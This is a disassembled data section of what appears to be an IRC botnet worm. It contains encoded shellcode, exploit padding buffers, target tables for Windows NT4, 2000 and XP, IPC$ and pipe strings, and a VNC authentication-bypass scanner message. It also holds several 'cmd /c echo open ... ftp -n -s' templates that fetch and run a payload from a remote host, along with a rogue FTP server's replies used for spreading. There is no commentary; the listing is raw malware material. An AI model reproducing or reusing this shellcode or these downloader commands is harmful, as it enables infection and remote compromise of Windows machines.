dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dword_448ECC dd 23h ; DATA XREF: sub_40D2DA+1B�o
; char dword_448ED0[]
dword_448ED0 dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_40D335+E8�o
; char aCccc[]
aCccc db 'CCCC',0 ; DATA XREF: sub_40D335+153�o
align 4
dword_448EE4 dd 3 ; DATA XREF: sub_40D335+246�o
; char dword_448EE8[]
dword_448EE8 dd 0A1h ; DATA XREF: sub_40D335+29F�o
; char dword_448EEC[]
dword_448EEC dd 30h ; DATA XREF: sub_40D335+2CA�o
; char dword_448EF0[]
dword_448EF0 dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40D335+2F5�o
; char dword_448EFC[]
dword_448EFC dd 60h ; DATA XREF: sub_40D335+320�o
; char aCmdCEchoOpenSD[]
aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: sub_40DB0C+57�o
db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0
align 8
dword_448F68 dd 0E983C933h, 0D9EED9AFh, 5BF42474h, 0BB137381h, 836AD31Eh
; DATA XREF: sub_40E3C7+2B3�o
dd 0F4E2FCEBh, 25387447h, 952CE753h, 6587E44h, 2F583A9Fh
dd 6FAF9587h, 0E13C1FC3h, 355806F4h, 89381F9Bh, 5E58578Bh
dd 5B3D1F30h, 0EE7F877Bh, 0ABD46A7Bh, 0A8D21371h, 3EE8EA50h
dd 89A6369Fh, 6BF74130h, 66587850h, 768C95F0h, 46D0F5BAh
dd 4EBF9730h, 5B107FA7h, 2A587A7Bh, 6693958Bh, 0C7CF6E30h
dd 34DB5E30h, 649D90D3h, 0BC2C4E57h, 39B5C58Ah, 58E076DDh
dd 58A069D3h, 0BA2C4AE4h, 963ED5D3h, 0BC2C4E80h, 0C3697E4h
dd 68DBF33Ah, 95D174EEh, 630A766Bh, 9584B34Eh, 39804D6Dh
dd 39904DE8h, 0BA2C4DF8h, 0FD376DDh, 8B5A4DDDh, 7077762Eh
dd 9584D9CBh, 3BC3746Dh, 203E1EEh, 83FDB31Fh, 3905E1ECh
dd 203E1EEh, 2355575Eh, 3A05E1ECh, 95864AEFh, 8DBB8D6Bh
dd 3DAAD8C2h, 9586C844h, 0EB9786Bh, 7B076DDh, 3AB9FB32h
dd 0E31F37E2h, 0E397745Ch, 99132F59h, 4791E011h, 0F9FF5C45h
dd 0C1EB6436h, 18BBB510h, 95C5AD45h, 0BC2C5ACEh, 3B8149E0h
dd 6BB94FEAh, 3B864FEAh, 0C7BBCE44h, 391D1B62h, 95B9C844h
dd 0BA2C2944h, 0E92F4930h, 0BC2C7A7Fh, 203E1E9h, 0A33D054h
dd 9505E1E8h, 6AD31E6Bh, 0
dword_4490C8 dd 0EFFFC481h, 44FFFFh ; DATA XREF: sub_40E3C7+29A�o
dd offset aWindowsNt42000 ; "Windows NT4, 2000 (SP0-SP4)"
dword_4490D4 dd 42Ah ; DATA XREF: sub_40E3C7+24D�r
dword_4490D8 dd 3E8h ; DATA XREF: sub_40E3C7+2BE�r
dword_4490DC dd 258h ; DATA XREF: sub_40E3C7+290�r
byte_4490E0 db 1 ; DATA XREF: sub_40E3C7+1F9�r
; sub_40E3C7+2C7�r
align 4
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dd 1
dword_4490F8 dd 20804h ; DATA XREF: sub_40E2CB�r
; sub_40E3C7+2E5�o ...
aWindowsNt42000 db 'Windows NT4, 2000 (SP0-SP4)',0 ; DATA XREF: .data:004490D0�o
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .data:004490E4�o
align 10h
; char a__6[]
a__6 db '.',0 ; DATA XREF: sub_40E3C7+10�o
align 4
; char aSIpc[]
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40E3C7+33�o
align 10h
; char aSPipeBrowser[]
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_40E3C7+84�o
align 4
dword_449154 dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_40E3C7+F5�o
dword_449168 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_40E3C7+151�o
dword_44917C dd 2EBh, 0 ; DATA XREF: sub_40E3C7+221�o
; char aCmdCEchoOpen_0[]
aCmdCEchoOpen_0 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40E8CF+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
dword_4491F8 dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_40EB28+5A�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h)
dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h)
dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh
dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h
dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h
dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh
dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h
dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h
dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh
dd 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 4
; char aCmdCEchoOpen_1[]
aCmdCEchoOpen_1 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40EA11+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
word_44A480 dw 1 ; DATA XREF: sub_40EC5E+A�r
align 4
; char aRfb03d_03d[]
aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: sub_40EC5E+93�o
align 4
; char aVncD_DSSAuthby[]
aVncD_DSSAuthby db 'VNC%d.%d %s: %s - [AuthBypass]',0 ; DATA XREF: sub_40EC5E+1FC�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40EF74+130�o
; char aEchoOpenSDOEch[]
aEchoOpenSDOEch db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o'
; DATA XREF: sub_40F160+23E�o
db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_40F402+1C9�o
align 4
; char aSS_3[]
aSS_3 db '%s %s',0 ; DATA XREF: sub_40F402+251�o
align 4
; char aUser_1[]
aUser_1 db 'USER',0 ; DATA XREF: sub_40F402+262�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_40F402+277�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_40F402+287�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_40F402+29B�o
align 4
; char aSyst[]
aSyst db 'SYST',0 ; DATA XREF: sub_40F402+2AB�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_40F402+2BF�o
align 4
; char aRest[]
aRest db 'REST',0 ; DATA XREF: sub_40F402+2CF�o
align 4
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_40F402+2E3�o
align 10h
; char off_44A5C0[]
off_44A5C0 dd offset aAugustus+8 ; DATA XREF: sub_40F402+2F3�o
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_40F402+307�o
align 4
; char aType[]
aType db 'TYPE',0 ; DATA XREF: sub_40F402+317�o
align 4
; char aA_0[]
aA_0: ; DATA XREF: sub_40F402+32E�o
unicode 0, <A>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_40F402+342�o
; char aType_0[]
aType_0 db 'TYPE',0 ; DATA XREF: sub_40F402+352�o
align 4
; char aI[]
aI: ; DATA XREF: sub_40F402+369�o
unicode 0, <I>,0
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_40F402+37D�o
; char aPasv[]
aPasv db 'PASV',0 ; DATA XREF: sub_40F402+38D�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_40F402+3A0�o
align 4
; char aList_0[]
aList_0 db 'LIST',0 ; DATA XREF: sub_40F402+3DB�o
align 10h
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_40F402+3EE�o
align 4
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_40F402+41C�o
align 10h
; char aS_24[]
aS_24 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_40F402+455�o
db ']',0
; char aXX[]
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_40F402+499�o
align 10h
; char aS_S_S_S[]
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_40F402+4CC�o
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_40F402+4DD�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_40F402+4F2�o
align 4
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_40F402+50A�o
align 10h
; char aFtpTransferSta[]
aFtpTransferSta db 'ftp transfer started to: %s',0 ; DATA XREF: sub_40F402+533�o
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_40F402+57D�o
; char aFtpTransferCom[]
aFtpTransferCom db 'ftp transfer complete to: %s',0 ; DATA XREF: sub_40F402+58F�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_40F402+5E0�o
align 4
; char aQuit_1[]
aQuit_1 db 'QUIT',0 ; DATA XREF: sub_40F402+5ED�o
align 10h
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_40F402+601�o
; char aRb[]
aRb db 'rb',0 ; DATA XREF: sub_40FAB6+24�o
align 10h
; char aGet_0[]
aGet_0 db 'GET ',0 ; DATA XREF: sub_40FB50+26F�o
align 4
; char asc_44A7B8[]
asc_44A7B8: ; DATA XREF: sub_40FB50+292�o
unicode 0, < >,0
; char asc_44A7BC[]
asc_44A7BC: ; DATA XREF: sub_40FB50+297�o
unicode 0, < >,0
; char aGet_1[]
aGet_1 db 'GET ',0 ; DATA XREF: sub_40FB50+2A2�o
align 4
; char asc_44A7C8[]
asc_44A7C8 db 0Dh,0Ah,0 ; DATA XREF: sub_40FB50+2D5�o
align 4
; char asc_44A7CC[]
asc_44A7CC db '-' ; DATA XREF: sub_40FB50+3FE�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerFailedRe db ' server failed, returned %d',0
aTextHtml db 'text/html',0 ; DATA XREF: sub_40FFB1+5F�o
align 10h
; char aApplicationOct[]
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_40FFB1:loc_410017�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_40FFB1+84�o
align 10h
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_40FFB1+98�o
align 4
; char aHttp1_0200OkSe[]
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FFB1+D4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aHttp1_0200Ok_0[]
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FFB1+F7�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aS_25 db '\%s',0 ; DATA XREF: sub_410134+2F�o
; char aS_26[]
aS_26 db '%s',0 ; DATA XREF: sub_410134+3A�o
align 10h
; char aSS_4[]
aSS_4 db '%s%s',0 ; DATA XREF: sub_410134+EA�o
align 4
; char asc_44AA18[]
asc_44AA18: ; DATA XREF: sub_410134+FB�o
dw 0Ah
unicode 0, <>,0
; char asc_44AA1C[]
asc_44AA1C: ; DATA XREF: sub_410134+15A�o
unicode 0, <*>,0
; char asc_44AA20[]
asc_44AA20 db '-' ; DATA XREF: sub_410134+212�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aWorkerThreadOf db ' worker thread of server thread: %d.',0
align 4
; char asc_44AA54[]
asc_44AA54 db '-' ; DATA XREF: sub_410134+296�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_39 db ' failed to start worker thread, error %d',0
align 4
; char asc_44AA8C[]
asc_44AA8C db 0Ah,0 ; DATA XREF: sub_4103EB+29�o
align 10h
; char aPrivmsgSSearch[]
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4103EB+4B�o
; char aHtmlHeadTitleI[]
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_4103EB+79�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 10h
; char aH1IndexOfSH1Ta[]
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_4103EB+AE�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
; char aTrTdWidthDCode[]
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_4103EB+F9�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aTrTdColspan3Hr[]
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_4103EB+12D�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aSearchingForS[]
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4103EB+149�o
; char aTrTdColspan3AH[]
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_4103EB+1C5�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char a__[]
a__ db '..',0 ; DATA XREF: sub_4103EB+237�o
align 10h
; char a__2[]
a__2: ; DATA XREF: sub_4103EB+252�o
unicode 0, <.>,0
aPm_0 db 'PM',0 ; DATA XREF: sub_4103EB+28A�o
align 4
aAm db 'AM',0 ; DATA XREF: sub_4103EB+295�o
align 4
; char a2_2d2_2d4d2_2d[]
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_4103EB+2BF�o
; char aS_27[]
aS_27 db '<%s>',0 ; DATA XREF: sub_4103EB+2E9�o
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_4103EB+310�o
align 10h
; char aTrTdWidthDAHre[]
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_4103EB+328�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
; char aSS_5[]
aSS_5 db '%s%s/',0 ; DATA XREF: sub_4103EB+36C�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_4103EB+3B3�o
align 4
; char aCodeSCodeA[]
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_4103EB:loc_4107A5�o
align 10h
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_4103EB+3F9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aS_28[]
aS_28 db '<%s>',0 ; DATA XREF: sub_4103EB+40B�o
align 10h
; char a31s21s[]
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_4103EB+42F�o
align 10h
; char aPrivmsgS31s2_0[]
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_4103EB+46E�o
align 4
; char aTrTdWidthDAH_0[]
aTrTdWidthDAH_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4103EB+496�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
; char aSS_6[]
aSS_6 db '%s%s',0 ; DATA XREF: sub_4103EB+4DA�o
align 10h
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_4103EB+521�o
align 10h
; char aCodeSCodeA_0[]
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_4103EB:loc_410913�o
align 4
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_4103EB+571�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
; char a31s21sIBytes[]
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_4103EB+58D�o
align 4
; char aPrivmsgSFoundS[]
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_4103EB+61C�o
align 4
; char aTrTdColspan3_0[]
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4103EB+637�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
; char aFoundIFilesAnd[]
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_4103EB+652�o
align 4
; char aSSHttp1_1Refer[]
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_410B5C+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
; char asc_44AF64[]
asc_44AF64 db '-' ; DATA XREF: sub_410C7D+BB�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aClientConnecti db '- client connection from %s:%d.',0
; char aUseridUnixS[]
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_410C7D+116�o
; char asc_44AFA8[]
asc_44AFA8 db '-' ; DATA XREF: sub_410C7D+171�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aServerFailed_0 db '- server failed, returned %d',0
align 4
; char asc_44AFD4[]
asc_44AFD4 db '-' ; DATA XREF: sub_410E2B+E9�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aClientConnec_0 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
; char asc_44B01C[]
asc_44B01C db '-' ; DATA XREF: sub_410E2B+15E�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToSta_40 db 'Failed to start client thread, error: <%d>.',0
; char asc_44B058[]
asc_44B058 db '-' ; DATA XREF: sub_410FBC+E1�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aClientConnec_1 db 'Client connection to IP: %s:%d, Server thread: %d.',0
align 4
; char asc_44B09C[]
asc_44B09C db '-' ; DATA XREF: sub_410FBC+1AA�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aFailedToSta_41 db 'Failed to start connection thread, error: <%d>.',0
; char asc_44B0DC[]
asc_44B0DC db '-' ; DATA XREF: sub_411240+E1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorGetpeerna db '- Error: getpeername(): <%d>.',0
align 4
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_411240+172�o
align 4
; char asc_44B11C[]
asc_44B11C db '-' ; DATA XREF: sub_411240+1A2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedInS@ db '- User logged in: <%s@%s>.',0
; char asc_44B144[]
asc_44B144 db '-' ; DATA XREF: sub_411240+1C2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorSessionru db '- Error: SessionRun(): <%d>.',0
align 10h
; char asc_44B170[]
asc_44B170 db '-' ; DATA XREF: sub_411240+1E9�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedOutS db '- User logged out: <%s@%s>.',0
align 4
; char asc_44B19C[]
asc_44B19C db '-' ; DATA XREF: sub_411445:loc_41148A�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aProtocolString db '- Protocol string too long.',0
align 4
; char dword_44B1C8[]
dword_44B1C8 dd 234032Dh, 676F6C72h, 2646E69h, 4C202D03h, 6E69676Fh
; DATA XREF: sub_41149F+1B�o
dd 6A657220h, 65746365h, 52202C64h, 746F6D65h, 73752065h
dd 203A7265h, 4073253Ch, 2E3E7325h, 0
db 2Dh ; -
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aLoginRejectedR db '- Login rejected, Remote user: <%s@%s>.',0
align 4
; char asc_44B238[]
asc_44B238 db '-' ; DATA XREF: sub_4114CE+3D�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0
align 4
; char asc_44B264[]
asc_44B264 db '-' ; DATA XREF: sub_4114CE+70�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToInstal db '- Failed to install control-C handler, error: <%d>.',0
align 4
unk_44B2A8 db 2Dh ; - ; DATA XREF: sub_4114CE+106�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aReadyAndWaitin db '- Ready and waiting for incoming connections.',0
align 4
; char asc_44B2E4[]
asc_44B2E4 db '-' ; DATA XREF: sub_4114CE+177�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aClientConnec_2 db '- Client connection from IP: %s:%d, Server thread: %d.',0
; char asc_44B328[]
asc_44B328 db '-' ; DATA XREF: sub_4114CE+1FB�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_42 db '- Failed to start client thread, error: <%d>.',0
align 4
; char asc_44B364[]
asc_44B364 db '-' ; DATA XREF: sub_4114CE+219�o
db 3, 34h, 2
db 72h ; r
